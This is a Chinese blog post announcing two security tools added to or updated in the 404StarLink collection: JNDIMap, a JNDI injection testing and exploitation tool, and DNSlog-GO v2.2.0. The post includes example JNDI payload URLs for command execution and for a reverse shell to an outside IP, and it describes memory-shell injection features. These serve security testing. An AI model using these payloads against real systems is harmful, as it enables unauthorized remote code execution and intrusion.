404StarLink项目动态:JNDIMap新加入,DNSlog-GO迭代至v2.2.0

最新推荐文章于 2025-10-03 04:37:18 发布
原创 最新推荐文章于 2025-10-03 04:37:18 发布 · 311 阅读 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

404StarLink项目动态:JNDIMap新加入,DNSlog-GO迭代至v2.2.0

【免费下载链接】404StarLink 404StarLink - 推荐优质、有意义、有趣、坚持维护的安全开源项目 【免费下载链接】404StarLink 项目地址: https://gitcode.com/GitHub_Trending/40/404StarLink

你是否还在为JNDI漏洞测试缺乏高效工具而烦恼?是否觉得DNSlog平台功能单一难以满足复杂场景需求?本文将为你介绍404StarLink安全工具库的两项重要更新:全新加入的JNDI漏洞检测框架JNDIMap,以及DNSlog-GO工具的v2.2.0版本升级,帮助安全测试人员提升验证效率。

JNDIMap:一站式JNDI漏洞解决方案

404StarLink最新纳入的JNDIMap是一款由X1r0z开发的Java安全测试工具,专注于JNDI(Java命名和目录接口)漏洞的检测与利用。该工具支持RMI、LDAP和LDAPS多种协议,集成了针对高版本JDK的多种绕过技术,为安全研究人员提供了全面的JNDI漏洞测试能力。

核心功能亮点

JNDIMap的功能覆盖了从基础检测到高级利用的全流程:

  • 多协议支持:同时兼容RMI(远程方法调用)和LDAP(轻量级目录访问协议)
  • 丰富的攻击载荷:包含命令执行、反弹Shell、Meterpreter上线等多种利用方式
  • 高版本JDK绕过:实现了BeanFactory绕过、JDBC RCE、Tomcat Blind XXE等多种绕过技术
  • 内存马注入:集成MemShellParty实现无文件攻击
  • 自定义Payload:支持Nashorn JS和JShell两种方式生成自定义Payload

项目logo

快速上手示例

通过以下命令即可启动JNDIMap服务:

java -jar JNDIMap-version.jar -i 10.0.0.1

针对不同场景的测试用例:

# 执行计算器程序
rmi://10.0.0.1:1099/Basic/Command/open -a Calculator

# 反弹Shell
ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337

完整使用文档请参考JNDIMap详细说明

DNSlog-GO v2.2.0:功能全面升级

作为404StarLink中的老牌DNSlog工具,DNSlog-GO近日推出v2.2.0版本,带来了多项实用功能增强,进一步提升了DNS日志监控的灵活性和实用性。

版本更新亮点

v2.2.0版本主要更新内容包括:

  • 新增协议支持:添加LDAP和RMI协议的Payload生成功能
  • SSRF测试增强:使用location.protocol和location.host自动生成SSRF payload
  • 子域名优化:将domain的第一个部分作为subdomain使用,简化配置
  • 代码可读性提升:添加换行符优化代码格式

部署与使用

DNSlog-GO提供多种部署方式,Docker部署命令如下:

wget https://raw.githubusercontent.com/lanyi1998/DNSlog-GO/master/config.yaml
# 修改配置文件
docker run -d -p 53:53 -p 53:53/udp -p 8000:8000 -v `pwd`/config.yaml:/DNSlog-GO/config.yaml --name dnslog --privileged lanyi1998/dnslog-go:latest
docker update --restart=always dnslog

API调用示例

Python API调用示例:

import requests
import random
import json

class DnsLog():
    domain = ""
    token = ""
    Webserver = ""

    def __init__(self, Webserver, token):
        self.Webserver = Webserver
        self.token = token
        try:
            res = requests.post("http://" + Webserver + "/api/verifyToken", json={"token": token}).json()
            self.domain = res.Msg
        except:
            exit("DnsLog 服务器连接失败")
            
    # 生成随机子域名
    def randomSubDomain(self, length=5):
        subDomain = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', length)) + '.' + self.domain
        return subDomain

完整更新日志和使用指南见DNSlog-GO文档

如何获取与贡献

这两款工具已加入404StarLink安全工具库,你可以通过以下命令获取完整项目:

git clone https://gitcode.com/GitHub_Trending/40/404StarLink

404StarLink项目持续收录优质安全开源工具,如果你有好的项目推荐或使用反馈,欢迎通过项目README.md中的方式参与贡献。后续我们将带来"安全工具自动化测试框架"专题,敬请关注。

问题解答

注:本文工具使用需遵守相关法律法规,仅限授权环境下测试使用

【免费下载链接】404StarLink 404StarLink - 推荐优质、有意义、有趣、坚持维护的安全开源项目 【免费下载链接】404StarLink 项目地址: https://gitcode.com/GitHub_Trending/40/404StarLink

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值